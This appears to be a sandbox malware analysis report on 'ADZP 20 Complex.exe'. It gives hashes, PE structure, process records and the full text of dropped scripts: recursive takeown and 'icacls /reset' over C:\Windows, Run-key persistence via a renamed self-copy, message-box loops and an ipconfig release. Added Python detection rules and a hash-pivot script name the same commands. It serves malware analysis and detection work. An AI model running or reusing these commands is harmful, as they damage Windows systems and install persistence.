  Mensaje=msgbox("Error Critico",16,"Error")
  loop
  do
  Mensaje=msgbox("Error Critico",16,"Error")
  do
  Mensaje=msgbox("Error Critico",16,"Error")
  loop
  loop
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):270
                  Entropy (8bit):4.9225156073923015
                  Encrypted:false
                  SSDEEP:6:PiLk0HEBK4aX+3xiLk0HEBK4aX+3xiLk0HEBK4aX+3aiLk0HEBK4aX+3p:yHoSJHoSJHoSKHoSw
                  MD5:60F46EA792A5DFFB914B5DD117F3FE2D
                  SHA1:B9514637F141A9A01349AF7525CAE3D68B6EF1EE
                  SHA-256:176612256E253B6D51C2416CD6D6B67D0841600CC93DF96847D7C0ADBCC2AF93
                  SHA-512:0802E59F95CEA066B1C38DD76DB59779489F639726BE5D6AC4B97284452BFE012A7F7086A3C1625276075536903A8A28648214C2BDA5554F8F600DA7088CA6FB
                  Malicious:true
Preview (CRLF expanded; line order as captured):
  do
  Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")
  loop
  do
  Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")
  loop
  do
  Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")
  do
  Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")
  loop
                  Process:C:\Windows\System32\cmd.exe
                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):655
                  Entropy (8bit):4.699536698426096
                  Encrypted:false
                  SSDEEP:12:w74PFs614O6Zrw74PFs614O6Zrw74PFs614O6Zrw74PFs614OB:A4PFs614O6ZrA4PFs614O6ZrA4PFs61i
                  MD5:D72C8F42DA75FD710F2C2049EF99AE22
                  SHA1:4BA68526F571015D92D168D782BEF2279886C64E
                  SHA-256:2888909CE97C3AEC42762412C31A8DEC522A38DD3C4F37392EFED2F22CD6EA93
                  SHA-512:AAB64BB5C94670D6154E5D72239390C9E484100B5563AB5A67E1495C4D374ED8CBDB6D84D6BD7E72816173B5A25C1C52AD9E18468D5D7444E1C44216F85B9811
                  Malicious:false
Preview (CRLF expanded; the six-line body appears four times, the last time without its final icacls line, exactly as captured; 655 bytes in total):
  @echo off
  title Taskdl
  takeown /f "C:\Windows\System32" /r
  icacls "C:\Windows\System32" /reset /t /c /q
  takeown /f "C:\Windows" /r
  icacls "C:\Windows" /reset /t /c /q
  @echo off
  title Taskdl
  takeown /f "C:\Windows\System32" /r
  icacls "C:\Windows\System32" /reset /t /c /q
  takeown /f "C:\Windows" /r
  icacls "C:\Windows" /reset /t /c /q
  @echo off
  title Taskdl
  takeown /f "C:\Windows\System32" /r
  icacls "C:\Windows\System32" /reset /t /c /q
  takeown /f "C:\Windows" /r
  icacls "C:\Windows" /reset /t /c /q
  @echo off
  title Taskdl
  takeown /f "C:\Windows\System32" /r
  icacls "C:\Windows\System32" /reset /t /c /q
  takeown /f "C:\Windows" /r
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with very long lines (477), with CRLF line terminators
                  Category:dropped
                  Size (bytes):15931
                  Entropy (8bit):3.298409240467509
                  Encrypted:false
                  SSDEEP:384:qxNZ/DcOQvZ/2daJlUVu/qmVnQdrGtWNd1LqmzUBdc6:QrbtQvh2daJ9FQdryW9+w6j
                  MD5:5818B565790E0C2EF6675FCB34AC3A46
                  SHA1:E9A76A47371CB6E1FC7E102057A660713182DF62
                  SHA-256:3697C12440CAA67CA967145AFD9037E59A32B810C065F5E8BD6437AD00AACC91
                  SHA-512:D2EE198F78EF22A36531AD8A8D21A1041C2DE4D9C41785EC0A9420B5A254F6F735BA4664D7FB3F729F7C9855A0E6B17C01785DCEAA4B3EE53F406BE51730B9AD
                  Malicious:false
                  Preview:2434814743715103189409577387924141266615698130701893229350285026175306292665921349239665222875310226443402311799006272662291120300124192565396142583047699306173751406514797271881660245402586435322613413089850247456733114417279184321836284922533427917920312907549623391615429697296552864017298455105528933254222495245381508192021779711353639417195148572561711584251677679297661833313446155392774796943180170305826666428714203741812412268683628813210892073315957..313531497023135254491351618188228482949628997670424939107514111323861282615227119122989474362653124660176182556014519766755443264114717963220706161028154222362184391641516028431559522341318152630114811276992675413887202182486612051111872647112482275784205446412604227301612824755321982520431081152357798325832855360302517129176252127068811422623195451980220160112032605798471289157191615617294806169007978169982070011291398915415355631051031832014310142950824936190582307023344..22125320721719830089307212942820025780629732659319012772660
A second 39-byte file with identical hashes and the same single line (`call C:\Windows\System32\Twain_20.dll`) was dropped by cmd.exe; the duplicate entry is collapsed here.
                  Process:C:\Windows\System32\cmd.exe
                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):108544
                  Entropy (8bit):7.015918699786388
                  Encrypted:false
                  SSDEEP:3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
                  MD5:8B6A377F9A67D5482A8EBA5708F45BB2
                  SHA1:7197436525E568606850EE5E033C43AEA1C3BC91
                  SHA-256:6CA11C8B6442DB97C02F3B0F73DB61F58C96D52E8A880E33ABEE5B10807D993F
                  SHA-512:644E51798399168530B05E629B414DD80CAC678BD3C8D4A5D164F55736A2B2FD380D3CA4640F7A034C8F043C06B1527B473E2D17DA088D5E97DE6EA04120DD72
                  Malicious:true
Note: MD5, SHA1, SHA-256 and size are identical to the submitted sample ADZP 20 Complex.exe (see the static information below), so this "DLL" is a byte-for-byte copy of the sample under a new name; Twain_20.cmd, the Run-key target, invokes it with `call`.
Yara Hits:
• Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Twain_20.dll, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....................0....@.........................................................................lq...........I..........................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc....I.......J...^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Windows\System32\cmd.exe
                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):49
                  Entropy (8bit):4.173297793439888
                  Encrypted:false
                  SSDEEP:3:mKDDUnXrLDQhshov:hAvQv
                  MD5:CFB046D3C9513B92C1B287DA26F97C28
                  SHA1:EA8208C4DAD826B7FDB3B5B728863A95E86D4383
                  SHA-256:A06F170D4F92BF290E38B0CE1C05BB59C95DE2797B1A5253B949AD7E1BE9818B
                  SHA-512:DBEEEA4D284F59E1455A5426334CAA02458E88833AEECE9817C51BE616697CA4C399B2A9D0E8E44BF4A5EE63D0B37C0AED68C01F1748FA5A23ED6D2AF62B3340
                  Malicious:false
Preview (CRLF expanded; `ipconfig/release_all` is spelled exactly as in the file):
  @echo off
  break off
  ipconfig/release_all
  end
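The dropped scripts above give the concrete command lines behind the behavior-graph signatures "Uses cmd line tools excessively to alter registry or file data", "Uses ipconfig to lookup or modify the Windows network settings" and "Command shell drops VBS files": a recursive takeown and icacls /reset over C:\Windows and C:\Windows\System32 (Taskdl batch), VBS message-box loops dropped to the desktop, a Run-key value pointing at Twain_20.cmd in %TEMP% (autostart table), and ipconfig/release_all. The following is an added example, not part of the Joe Sandbox report, of detection logic over process-creation events modelled on those commands. The events are constructed here rather than captured from the sandbox; events 2 and 3 (the wscript launch of Informacion.vbs and a `reg add` form of the Run-key write) are assumed shapes of actions the report records only by their effects, and the rule names are the example's own.

```python
"""Added example: detection logic over constructed process-creation events
modelled on the commands found in the dropped scripts of this report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed events (not sandbox-captured). Command lines 0, 1 and 4 are copied from
# the dropped batch previews; 2 and 3 are assumed shapes of the VBS launch and the
# Run-key write, which the report records only by their effects. Event 5 is a benign control.
EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\takeown.exe",
              r'takeown /f "C:\Windows\System32" /r'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\icacls.exe",
              r'icacls "C:\Windows\System32" /reset /t /c /q'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript C:\Users\user\Desktop\Informacion.vbs"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 "
              r"/d C:\Users\user\AppData\Local\Temp\Twain_20.cmd /f"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ipconfig.exe",
              r"ipconfig/release_all"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\takeown.exe",
              r"takeown /f C:\Users\user\Documents\report.docx"),
]

USER_WRITABLE = re.compile(r"\\users\\|\\temp\\|\\appdata\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)
WINDOWS_DIR = re.compile(r"c:\\windows", re.I)


def _flag(cmd, flag):
    """True if the switch appears as a standalone token (so /r does not match /reset)."""
    return re.search(r"(^|\s)" + re.escape(flag) + r"(\s|$)", cmd, re.I) is not None


def _image_is(e, *names):
    return e.image.lower().rsplit("\\", 1)[-1] in names


def rule_recursive_takeown(e):
    # takeown /r against the Windows directory: ownership of every object is moved to the caller
    return (_image_is(e, "takeown.exe") and _flag(e.command_line, "/r")
            and WINDOWS_DIR.search(e.command_line) is not None)


def rule_icacls_reset(e):
    # icacls /reset /t under C:\Windows: explicit ACEs are discarded and inherited defaults re-applied
    return (_image_is(e, "icacls.exe") and _flag(e.command_line, "/reset")
            and _flag(e.command_line, "/t") and WINDOWS_DIR.search(e.command_line) is not None)


def rule_script_host(e):
    # wscript/cscript running a script file from a user-writable location
    return (_image_is(e, "wscript.exe", "cscript.exe")
            and SCRIPT_EXT.search(e.command_line) is not None
            and USER_WRITABLE.search(e.command_line) is not None)


def rule_run_key_script(e):
    # Run-key value whose data is a script in a user-writable directory (the Twain_20 entry)
    return (_image_is(e, "reg.exe")
            and re.search(r"\\currentversion\\run\b", e.command_line, re.I) is not None
            and USER_WRITABLE.search(e.command_line) is not None
            and re.search(r"\.(cmd|bat|vbs|vbe|js|jse|wsf)\b", e.command_line, re.I) is not None)


def rule_ipconfig_release(e):
    # DHCP lease release from a shell; the dropped batch spells it ipconfig/release_all
    return _image_is(e, "ipconfig.exe") and re.search(r"/release", e.command_line, re.I) is not None


RULES = {
    "recursive_takeown_windows_dir": rule_recursive_takeown,
    "icacls_reset_windows_dir": rule_icacls_reset,
    "script_host_user_writable_script": rule_script_host,
    "run_key_user_writable_script": rule_run_key_script,
    "ipconfig_release": rule_ipconfig_release,
}


def evaluate(events):
    """Return (rule_name, event_index) pairs for every rule that fires on every event."""
    return [(name, idx) for idx, e in enumerate(events)
            for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for name, idx in evaluate(EVENTS):
        print(f"{name:36} <- {EVENTS[idx].command_line}")
```

The takeown and icacls rules are deliberately scoped to C:\Windows: a single-file takeown by an administrator (event 5) is routine, whereas a recursive one over System32 followed by an ACL reset is the combination this sample uses, and the two fire on consecutive events from the same cmd.exe parent.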
                  Process:C:\Windows\System32\cmd.exe
                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):108544
                  Entropy (8bit):7.015918699786388
                  Encrypted:false
                  SSDEEP:3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
                  MD5:8B6A377F9A67D5482A8EBA5708F45BB2
                  SHA1:7197436525E568606850EE5E033C43AEA1C3BC91
                  SHA-256:6CA11C8B6442DB97C02F3B0F73DB61F58C96D52E8A880E33ABEE5B10807D993F
                  SHA-512:644E51798399168530B05E629B414DD80CAC678BD3C8D4A5D164F55736A2B2FD380D3CA4640F7A034C8F043C06B1527B473E2D17DA088D5E97DE6EA04120DD72
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 63%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....................0....@.........................................................................lq...........I..........................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc....I.......J...^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
A second Zone.Identifier stream with identical content ([ZoneTransfer] / ZoneId=0) and hashes was also dropped by cmd.exe; the duplicate entry is collapsed here.
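Two facts are scattered across the entries above and are easy to miss when reading them one by one: the dropped Twain_20.dll carries exactly the submitted sample's hashes (a renamed copy of ADZP 20 Complex.exe, referenced by the Run-key target Twain_20.cmd through `call C:\Windows\System32\Twain_20.dll`), and the four .bat drops share a single hash. The script below is an added example, not part of the report, of pulling such facts out mechanically with a hash pivot over the report's key:value entries. REPORT_EXCERPT is a hand-trimmed subset of the entries above (hash values and field names as the report prints them; each entry starts at its Process: line); the sample hash is the one from the static information section.

```python
"""Added example: hash pivot over the dropped-file entries of this report."""
from collections import Counter

# SHA-256 of the submitted sample, as printed in the report's static information.
SAMPLE_SHA256 = "6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f"

# Constructed excerpt: five of the entries above, trimmed to the fields used here.
REPORT_EXCERPT = r"""
Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
Category:dropped
Size (bytes):17630
SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
Malicious:true
Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
Category:dropped
Size (bytes):17630
SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
Malicious:true
Process:C:\Windows\System32\cmd.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):108544
SHA-256:6CA11C8B6442DB97C02F3B0F73DB61F58C96D52E8A880E33ABEE5B10807D993F
Malicious:true
Process:C:\Windows\System32\cmd.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):108544
SHA-256:6CA11C8B6442DB97C02F3B0F73DB61F58C96D52E8A880E33ABEE5B10807D993F
Malicious:true
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:false
"""


def parse_entries(text):
    """Split the flat key:value dump into one dict per file.
    The report opens every entry with a Process: line, so that key starts a new record;
    the first ':' separates key from value, so drive letters in values survive."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            entries.append({})
        if entries:
            entries[-1][key] = value
    return entries


def pivot(entries, sample_sha256):
    """Group entries by SHA-256 and report what an analyst wants first:
    copies of the submitted sample under other names, PE drops, and content dropped repeatedly."""
    by_hash = Counter(e["SHA-256"].lower() for e in entries)
    return {
        "unique_hashes": len(by_hash),
        "self_copies": sum(1 for e in entries if e["SHA-256"].lower() == sample_sha256.lower()),
        "pe_drops": sum(1 for e in entries
                        if e["Category"] == "dropped" and e["File Type"].startswith("PE32")),
        "repeated": {sha: n for sha, n in by_hash.items() if n > 1},
    }


if __name__ == "__main__":
    print(pivot(parse_entries(REPORT_EXCERPT), SAMPLE_SHA256))
```

On the excerpt this yields three unique hashes, two self-copies (both Twain_20.dll drops), two PE drops and two repeated hashes; on the full entry list the .bat hash repeats four times. A self-copy with a .dll extension and a console subsystem is the combination to pivot on in fleet telemetry: the hash is already known, only the file name changed.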
                  File type:PE32 executable (console) Intel 80386, for MS Windows
                  Entropy (8bit):7.015918699786388
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.94%
                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • VXD Driver (31/22) 0.00%
                  File name:ADZP 20 Complex.exe
                  File size:108'544 bytes
                  MD5:8b6a377f9a67d5482a8eba5708f45bb2
                  SHA1:7197436525e568606850ee5e033c43aea1c3bc91
                  SHA256:6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
                  SHA512:644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
                  SSDEEP:3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
                  TLSH:B2B38D41F2E242F7EAF2053100A6712F973663389764E8EBC75C2D529913AD1A73D3E9
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....................0....@........................................................................
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x401000
                  Entrypoint Section:.code
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows cui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:
                  Time Stamp:0x5D40055D [Tue Jul 30 08:52:45 2019 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:2c5f2513605e48f2d8ea5440a870cb9e
                  Instruction
                  push 000000ACh
                  push 00000000h
                  push 00418068h
                  call 00007F9DE8E04831h
                  add esp, 0Ch
                  push 00000000h
                  call 00007F9DE8E0482Ah
                  mov dword ptr [0041806Ch], eax
                  push 00000000h
                  push 00001000h
                  push 00000000h
                  call 00007F9DE8E04817h
                  mov dword ptr [00418068h], eax
                  call 00007F9DE8E04791h
                  mov eax, 0041707Ch
                  mov dword ptr [0041808Ch], eax
                  call 00007F9DE8E0DC52h
                  call 00007F9DE8E0D9BAh
                  call 00007F9DE8E0A898h
                  call 00007F9DE8E0A11Ch
                  call 00007F9DE8E09BAFh
                  call 00007F9DE8E09929h
                  call 00007F9DE8E08DCDh
                  call 00007F9DE8E0854Dh
                  call 00007F9DE8E04B0Fh
                  call 00007F9DE8E0C518h
                  call 00007F9DE8E0AFC0h
                  mov edx, 0041702Eh
                  lea ecx, dword ptr [00418074h]
                  call 00007F9DE8E047A8h
                  push FFFFFFF5h
                  call 00007F9DE8E047B8h
                  mov dword ptr [00418094h], eax
                  mov eax, 00000200h
                  push eax
                  lea eax, dword ptr [00418110h]
                  push eax
                  xor eax, eax
                  push eax
                  push 00000015h
                  push 00000004h
                  call 00007F9DE8E09B72h
                  push dword ptr [004180F8h]
                  Name                                  Virtual Address  Virtual Size  Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x1716c          0xc8          .data
                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x19000          0x4980        .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IAT             0x17470          0x23c         .data
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                  Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy           | Characteristics
                  .code  | 0x1000          | 0x387e       | 0x3a00   | 46da2c5018752470fd3127bf22d63b95 | False    | 0.4595231681034483 | data      | 5.529218938453912 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .text  | 0x5000          | 0xd962       | 0xda00   | e1a026e66953c410d7f60b1f1e3c560f | False    | 0.5144244552752294 | data      | 6.56248809649253  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata | 0x13000         | 0x33a5       | 0x3400   | a16842a34a5da6feda9533bb3e83c3c1 | False    | 0.8049128605769231 | data      | 7.111835561466389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data  | 0x17000         | 0x178c       | 0x1200   | 0e393c9154c78f64d30710272e678f07 | False    | 0.4029947916666667 | data      | 5.098508569279054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc  | 0x19000         | 0x4980       | 0x4a00   | 49bccf31418201908e0ba34120c9b108 | False    | 0.9745565878378378 | data      | 7.951434337190055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name         RVA      Size    Type                          Language  Country  ZLIB Complexity
                  RT_RCDATA    0x1921c  0xe     zlib compressed data                             1.5714285714285714
                  RT_RCDATA    0x1922c  0x1     very short file (no magic)                       9.0
                  RT_RCDATA    0x19230  0x44d7  data                                             1.0009079044430573
                  RT_RCDATA    0x1d708  0x14    data                                             1.45
                  RT_MANIFEST  0x1d71c  0x263   XML 1.0 document, ASCII text                     0.5319148936170213
                  DLL: Import
                  MSVCRT.dll: memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc
                  KERNEL32.dll: GetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject
                  USER32.DLL: CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                  GDI32.DLL: GetStockObject
                  COMCTL32.DLL: InitCommonControlsEx
                  SHELL32.DLL: ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                  WINMM.DLL: timeBeginPeriod
                  OLE32.DLL: CoInitialize, CoTaskMemFree
                  SHLWAPI.DLL: PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                  No network behavior found

                  Target ID:0
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\ADZP 20 Complex.exe"
                  Imagebase:0x400000
                  File size:108'544 bytes
                  MD5 hash:8B6A377F9A67D5482A8EBA5708F45BB2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:1
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:3
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K Twain_20.cmd
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:5
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K Twain_20.cmd
                  Imagebase:0x7ff6a8fb0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:6
                  Start time:21:22:56
                  Start date:18/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:7
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
                  Imagebase:0x7ff7f9e90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:8
                  Start time:21:22:57
                  Start date:18/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
